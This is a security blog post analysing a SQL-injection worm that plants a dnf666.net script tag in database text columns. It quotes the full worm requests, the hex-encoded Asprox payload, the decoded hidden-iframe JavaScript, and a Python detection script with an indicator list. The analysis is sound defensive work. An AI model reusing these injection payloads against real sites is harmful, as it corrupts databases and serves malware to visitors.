Our ZION SECURED WAMAF has been blocking a lot of attacks lately. Some of them are worth investigating because they reveal new threats.
Most of you probably know about the Asprox worm; see http://matchent.com/wpress/?q=node/419
This weekend a bot attacked this blog, protected by ZION SECURED WAMAF:
GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*
The User-Agent header indicates that this is not a browser but the well-known command-line tool curl, running on Windows. This request tests whether the database already contains data with the string dnf666, probably to see if the database is already infected with the malicious payload.
Because we don't reply with an HTTP 500 error but redirect to the homepage instead, the worm goes on to inject its payload with the following GET request:
GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*
Comparing this with the original Asprox payload (see http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html) shows that the attack above comes from a different worm than Asprox:
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283430303029204445434C41524520546162
6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622
E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202
8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D
323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7
2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206
57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646
F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252
23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F
7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--
First of all, the worm uses a mix of lower- and upper-case letters, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is meant to bypass web application firewalls or filters that trigger on the exact strings DECLARE, FETCH NEXT FROM TABLE, etc., which is interesting.
The malicious payload itself is injected the same way as in Asprox, as a hex-encoded string passed through CAST:
3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752
E6A733E3C2F7363726970743E
This can be ASCII HEX decoded using Burp Decoder, resulting in <script src=http://www.dnf666.net/u.js></script>.
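To make the two obfuscation layers concrete, here is an added Python example (not code from the post, from the worm, or from the ZION SECURED WAMAF) that decodes the second request quoted above and flags it with a normalizing filter. The raw request never contains the string DECLARE, and the script tag only appears once the CAST hex literal is decoded, so a filter has to percent-decode, hex-decode and lowercase the input before matching. The sample query string is the one from the request above joined into one line; the indicator list is my own assumption, not a complete SQL-injection signature set.

```python
"""Decode and flag the dnf666 SQL-injection worm request quoted in the post.

Added example: it shows why mIxEd-CaSe keywords and a hex-encoded
CAST(0x...) literal defeat a naive case-sensitive filter, and how a
normalizing filter recovers the real payload before matching.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample: the query string of the second worm request from the
# post, joined into one line (request path and headers omitted).
WORM_QUERY = (
    "show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20"
    "dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20"
    "FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20"
    "a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20"
    "b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20"
    "next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)"
    "%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D"
    "=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT("
    "0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E6574"
    "2F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'"
    "%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20"
    "tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20"
    "dEAlLoCaTe%20tAbLe_cursoR;--"
)

# Constructed benign request to the same parameter, for comparison.
BENIGN_QUERY = "show=Code+review"

# Indicators the normalizing filter looks for. Assumed list, taken from the
# statements visible in the decoded worm; not a complete signature set.
INDICATORS = (
    "declare",
    "cursor for select",
    "sysobjects",
    "syscolumns",
    "exec(",
    "<script",
    "dnf666",
)

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def url_decode(query):
    """Percent-decode the query string: '+' becomes a space, '%2B' a '+'."""
    return unquote_plus(query)


def decode_hex_literals(sql):
    """Replace each 0x... literal with the text CAST(... AS varchar) would yield."""
    def repl(match):
        digits = match.group(1)
        if len(digits) % 2:  # odd length: not a whole byte string, leave it
            return match.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"
    return HEX_LITERAL.sub(repl, sql)


def normalize(query):
    """URL-decode, hex-decode, lowercase and squeeze whitespace before matching."""
    text = decode_hex_literals(url_decode(query))
    return re.sub(r"\s+", " ", text).lower()


def naive_match(query, keyword):
    """Case-sensitive substring match on the raw request: what the worm's spelling defeats."""
    return keyword in query


def extract_injected_html(query):
    """Return the decoded hex literals, i.e. the HTML the worm appends to every text column."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_LITERAL.findall(url_decode(query)) if len(h) % 2 == 0]


def detect(query):
    """Indicators present after normalization; an empty list means no hit."""
    text = normalize(query)
    return [ind for ind in INDICATORS if ind in text]


if __name__ == "__main__":
    print("raw request contains 'DECLARE':", naive_match(WORM_QUERY, "DECLARE"))
    print("injected HTML:", extract_injected_html(WORM_QUERY))
    print("indicators after normalization:", detect(WORM_QUERY))
    print("benign request indicators:", detect(BENIGN_QUERY))
```

Running it shows the naive check returning False while the normalized filter reports every indicator, including the decoded `<script src=http://www.dnf666.net/u.js></script>` that never appears literally in the request. The same normalization is what a WAF rule or a log-search query needs to apply before matching keywords, otherwise both evasion layers succeed.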
Loading this script (dangerous!) returns:
try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");document.write("<iframe src=http://www.dnf666.net/cnzz.html width=0 height=0></iframe>");}
The cnzz.html page loaded in that hidden iframe returns:
<div style=display:none><script src="http://s10.cnzz.com/stat.php?id=1990191&web_id=1990191" language="JavaScript"></script></div>
Google Safe Browsing does not currently list the cnzz.com domain as suspicious, but its diagnostic page shows that the site hosted malware in the past:
Safe Browsing
Diagnostic page for cnzz.com
What is the current listing status for cnzz.com?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.
Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).
Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.
This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.
Visiting this URL is blocked by ScanSafe.
So it's basically the same as Asprox: a script tag pointing to a malicious file is injected into every text column of the database.
Googling for the string dnf666.net/u.js already reveals some victims, including some high-profile sites!
Be careful when browsing!